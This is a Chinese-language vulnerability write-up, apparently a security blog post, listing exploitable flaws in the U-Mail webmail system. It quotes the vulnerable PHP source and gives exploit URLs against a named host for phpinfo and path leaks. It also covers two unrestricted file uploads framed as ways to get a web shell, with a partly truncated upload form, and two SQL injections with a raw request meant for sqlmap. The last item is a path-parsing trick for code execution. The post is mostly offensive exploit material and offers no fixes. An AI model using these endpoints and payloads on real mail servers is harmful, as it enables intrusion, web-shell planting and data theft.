U-mail 最新版漏洞大阅兵(信息泄露,多个getshell,多处SQL注入漏洞,远程代码执行)

1、信息泄露 (phpinfo信息泄露)

http://www.xxx.com/webmail/client/mail/index.php?module=test&action=info

phpinfo()信息泄露

其中源码如下:WorldClient\html\client\mail\module\info.php
[php]
if ( !defined( "PRELOAD_OK" ) )

{

exit( "error" );

}

require_once( LIB_PATH."Mailbox.php" );

require_once( LIB_PATH."Widget.php" );

$Mailbox = Mailbox::getinstance( );

$Widget = Widget::getinstance( );

$Domain = Domain::getinstance( );

$email = get_session( "email" );

$user_id = get_session( "user_id" );

$domain_id = get_session( "domain_id" );

phpinfo( );

?>[/php]
Exp: http://mail.0day5.com/webmail/client/mail/index.php?module=test&action=info
2、信息泄露(phpinfo)

在根目录当中有info.php该文件….

地址为:http://mail.0day5.com/webmail/info.php

3、网站物理路径信息泄露

http://mail.0day5.com/webmail/customer/autoresp.php

http://mail.0day5.com/webmail/client/mail/index.php?module=operate&action=attach-packdown

4、任意文件上传getshell

http://mail.0day5.com/webmail/client/mail/index.php?module=operate&action=attach-upload

WorldClient\html\client\mail\module\o_attach.php中
[php]
if ( ACTION == "attach-upload" )
{
if ( $_FILES )
{
$file_name = $_FILES['Filedata']['name'];
$file_type = $_FILES['Filedata']['type'];
$file_size = $_FILES['Filedata']['size'];
$file_source = $_FILES['Filedata']['tmp_name'];
$file_suffix = getfilenamesuffix( $file_name ); //取后缀名
$path_target = getusercachepath( );
do
{
$file_id = makerandomname( );
$file_target = $path_target.$file_id.".".$file_suffix;
} while ( file_exists( $file_target ) );
if ( !move_uploaded_file( $file_source, $file_target ) ) //未进行任何判断,直接写入了。。。。
{
dump_json( array(
"status" => 0,
"message" => el( "写入文件出错,请与管理员联系!", "" )
) );
}
$_SESSION[SESSION_ID]['attach_cache'][] = array(
"id" => $file_id,
"name" => $file_name,
"type" => "1",
"path" => $file_target,
"size" => $file_size
);
dump_json( array(
"status" => "1",
"filename" => $file_name,
"filesize" => $file_size,
"file_id" => $file_id
) );
}
[/php]
在上传之后,他会返回地址,如
"file_id" => $file_id 其中就将上传之后的文件名给回显出来了。。
Exp 如下:
[php]

action="http://mail.0day5.com/webmail/client/mail/index.php?module=operate&action=attach-upload-batch" method="post">Upload a new file:


[/php]

5、任意文件上传getshell 之二
http://mail.0day5.com/webmail/client/mail/index.php?module=operate&action=attach-upload-batch
其中只是多了个数组判断类型,也是同样方法getshell

6、SQL注入漏洞一
http://mail.0day5.com/webmail/client/netdisk/index.php?module=operate&action=move&fid=3&file=1
代码如下:
[php]
$Netdisk->initTreeObject( $user_id, 0 );
if ( ACTION == "move" )
{
$file_ids = gss( $_GET['file'] ); //无过滤,直接进入了
$folder_ids = gss( $_GET['folder'] );
$folder_id = gss( $_GET['fid'] );
if ( !$folder_id )
{
dump_json( array( "status" => 0, "message" => "参数错误!" ) );
}
if ( $file_ids )
{
$where = "user_id='".$user_id."' AND file_id IN (".$file_ids.")"; //传进来了,产生SQL注入漏洞
$data = array(
"folder_id" => $folder_id
);
$result = $Netdisk->update_file( $data, $where, 0 );
if ( !$result )
{
dump_json( array( "status" => 0, "message" => "移动文件时发生错误,移动失败!" ) );
}
}[/php]
抓包,然后放sqlmap当中
[php]
GET /webmail/client/netdisk/index.php?module=operate&action=move&fid=3&file=1 HTTP/1.1
Host: mail.0day5.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=9c6ff50907e53333c9b81264c6ea0ef8
Connection: keep-alive
[/php]

7、SQL注入漏洞二

http://mail.0day5.com/webmail/client/netdisk/index.php?module=operate&action=move&fid=3&folder=1
此次SQL注入参数为:folder
[php]
if ( $folder_ids )
{

$where = "user_id='".$user_id."' AND folder_id IN (".$folder_ids.")"; //同理
$data = array(
"parent_id" => $folder_id
);
$result = $Netdisk->update_folder( $data, $where, 0 );
if ( !$result )
{
dump_json( array( "status" => 0, "message" => "移动文件夹时发生错误,移动失败!" ) );
}
}[/php]
同理SQL注入漏洞

8、远程代码执行漏洞
由于该邮件系统采用的是php+mysql架构而成,而运行php的方式是采用了fast-cgi的方式

采用该方式,PHP-CGI远程任意代码执行漏洞
其中任意文件可导致以php方式解析,类似于(nigx)
如http://mail.0day5.com/1.jpg/1.php

发表评论